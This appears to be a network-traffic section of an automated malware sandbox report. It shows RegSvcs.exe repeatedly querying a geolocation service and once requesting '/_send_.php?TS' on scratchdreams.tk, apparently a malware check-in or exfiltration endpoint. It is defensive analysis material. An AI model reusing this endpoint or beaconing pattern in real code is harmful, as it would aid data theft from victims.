                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:20 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449747172.67.177.1344435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:22 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-04-08 11:59:22 UTC706INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:22 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79463
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9jDborLoT85dDycP7LXe95ZbdEGhz5%2FpbiHnJbC4jpTZQvuDbSFQBjRHi8cyprATDX6GM%2BkjIvKseaviqxFMEJutlCWG0gwHjYI1%2FV4YNRZowTOh6emsvuMJjeIYQd87cROiRBf"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 87121745dad66d9e-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:22 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449749172.67.177.1344435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:23 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:23 UTC706INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:23 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79464
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4H1pos%2FSrzy1JNihzQ0lpHQVZipYJQOyX2YXN7p4XyrQ%2F1vttsCKysMeZG5DOchoHYyBKXGsb%2BTEO1YWfD7Mzp86mlv95r9DvLGx4Iw4SwHCDUAFYs4g5784fhW8PqDleyBEFrY"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8712174b9a91a4e5-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:23 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449751172.67.177.1344435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:24 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-04-08 11:59:24 UTC712INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:24 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79465
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZF%2Fcl4IJtK8pqAvVAX%2BJDAahd5nb7fmIaacZ%2FUomO8wEwSbbEhgc6sm5PeMg0zg%2FBHGcfbvdY5p5Uw45wr%2Bq6ILOHMfPkMa6R3aLJqaEhVKfPovD%2BubZPTXQUCDNan7cDddpGxh1"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 87121751e9b5db0d-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:24 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449752104.21.27.854435444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:25 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                        Host: scratchdreams.tk
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:56 UTC743INHTTP/1.1 522
                                                        Date: Mon, 08 Apr 2024 11:59:56 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 15
                                                        Connection: close
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PGCKZS9%2FdPD0ZQnMiNlGz%2BgtP9yIRwn2rp3wAacwLkou18fLJfG8rO%2F%2BZSA2DGMV08VfCpFcXC6QHn0ZbQgLKqEpziQX%2BD2kb0ZH1iwH6TD2mxmV%2B1Dl%2BcUjNk0kU9BeXzg"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        X-Frame-Options: SAMEORIGIN
                                                        Referrer-Policy: same-origin
                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                        Server: cloudflare
                                                        CF-RAY: 871217580f5ea4f4-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:56 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                        Data Ascii: error code: 522


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449754172.67.177.1344433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:25 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:26 UTC704INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:26 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79467
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lI5UO2ckQXImT94StjQlGIVjTOHrAmPpYm2n5mh8yX6h5qrz%2BYJozi4czpASb1QfvSKX3uPKJLzuqINQ3uwSeHKCCTIrHnOoy%2F5DZaHmPE0o8jp7H3f6tSvUlkAoynLtYF3SU2qK"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8712175c68ab8da3-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:26 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449755172.67.177.1344433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:26 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-04-08 11:59:26 UTC706INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:26 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79467
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OvaLhmr95Dd6JtuMCP6jMOWaym0Xdbm5S6lbw3vIfraLWk0CPVyslkwlludLzjOq5ppZWNqi2%2B120YfNMI%2FCVvvgBJA0da7ybGKG21AeUOa9uLlHHx0jZ2YRRBYj1lOZdKsVk%2FQd"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 871217611e0a5c5f-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:26 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449757172.67.177.1344433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:27 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:27 UTC714INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:27 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79468
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gOxosF%2BSKpIpwjspfkb7yVGXw1SFvJ4SwABufC1Q6ohnR%2FTeD%2F97EdaAUApY1JinrODV9Ra%2BQK2QCju%2BDMrKsHZawkKD7MW3mTJM7rUjg%2FeRsLZdn9QFdDR6JK4uI4%2B9zHXWiZ16"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 87121766fe8adb09-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:27 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449759172.67.177.1344433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:28 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-04-08 11:59:29 UTC706INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:29 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79470
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdkoERRrGSwGXy4ojNr%2BESJxU5leTMOTkZnyFKUDEf1aC3cEfHNGvo%2FzhStZVmE1FwoDNYZWebVbkcnycXbYnIZWe4e0JKdiGR1K%2FHZu3MIutFzqj09PHxpvdi1f1CxGBCSIjb0H"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8712176eda84da05-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:29 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449761172.67.177.1344433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:29 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:30 UTC718INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:30 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79471
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xogmfyYtQETTEHFUhkA2rdJCeQ%2BejnJ31QBu3%2FU%2B98Kzc%2B6Ig3FPxxKpys2JoF67ZabHX%2BExL%2FgOC4jIauTH%2BtN90P71jiQnMDNKhye%2FFaqxyg6PCxNQXzvyjpwZLOOlOQC%2BPGP2"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 871217757d9d21eb-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:30 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.449763172.67.177.1344433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:30 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-04-08 11:59:31 UTC706INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:31 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79472
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUisl7%2BlgOIxBDzwd7yLt4c0mJOOucFR5Sb%2BuyzHuEnHxjtF895T4%2BkJwMoZSvsCCGiPz9yAD0VUkuh5uT1VEyhL8OY6VRaceK2g0at4xGO48gTEJv3iD5xyjGMQ3iWttwHWTQTn"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8712177b8d3921d9-MIA
                                                        alt-svc: h3=":443"; ma=86400
